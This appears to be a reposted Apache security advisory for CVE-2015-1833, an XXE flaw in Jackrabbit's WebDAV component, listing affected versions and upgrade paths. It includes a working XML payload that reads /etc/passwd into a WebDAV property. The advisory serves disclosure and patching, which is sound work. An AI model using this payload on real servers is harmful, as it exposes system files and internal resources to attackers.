2015 m. gegužės 22 d., penktadienis

CVE-2015-1833: Jackrabbit WebDAV XXE vulnerability

CVE-2015-1833: Jackrabbit WebDAV XXE vulnerability

Severity: Important

Vendor: The Apache Software Foundation

Versions Affected:
Jackrabbit 2.0.0 - 2.0.5
Jackrabbit 2.2.0 - 2.2.13
Jackrabbit 2.4.0 - 2.4.5
Jackrabbit 2.6.0 - 2.6.5
Jackrabbit 2.8.0
Jackrabbit 2.10.0
The unsupported Jackrabbit 1.x versions may be also affected

Impact:
The contents of files and other network resources that are accessible to the server running the WebDAV component may be exposed to users.

Description:
When processing a WebDAV request body containing XML, the XML parser can be instructed to read content from network resources accessible to the host, identified by URI schemes such as "http(s)" or  "file". Depending on the WebDAV request, this can not only be used to trigger internal network requests, but might also be used to insert said content into the request, potentially exposing it to the attacker and others (for instance, by inserting said content in a WebDAV property value using a PROPPATCH request). See also IETF RFC 4918, Section 20.6.

Mitigation:
This vulnerability only affects systems that use Jackrabbit's WebDAV component. If this isn't in use, no immediate action is required.

Solution:
2.10.x users should upgrade to 2.10.1
2.8.x users should obtain latest source from svn or apply the patch which will be included in 2.8.1
2.6.x users should obtain latest source from svn or apply the patch which will be included in 2.6.6
2.4.x users should obtain latest source from svn or apply the patch which will be included in 2.4.6
2.2.x users should apply the patch which will be included in 2.2.14
2.0.x users should apply the patch which will be included in 2.0.6
Patches are attached to <https://issues.apache.org/jira/browse/JCR-3883>


Example:

The following payload, sent in a WebDAV PROPPATCH request, will read the file "/etc/passwd" and include it's textual content in the JCR property "test" of the identified resource. The value could then be retrieved using a WebDAV PROPFIND request, JCR API calls, etc.

<?xml version="1.0"?> 
<!DOCTYPE propertyupdate [ 
  <!ENTITY xee SYSTEM "file:///etc/passwd"> 
]> 
<propertyupdate xmlns="DAV:">
  <set>
    <prop>
      <test xmlns="">&xee;</test>
    </prop>
  </set>
</propertyupdate>

Credit:
This issue was discovered by Mikhail Egorov <0ang3el@gmail.com>

Komentarų nėra:

Rašyti komentarą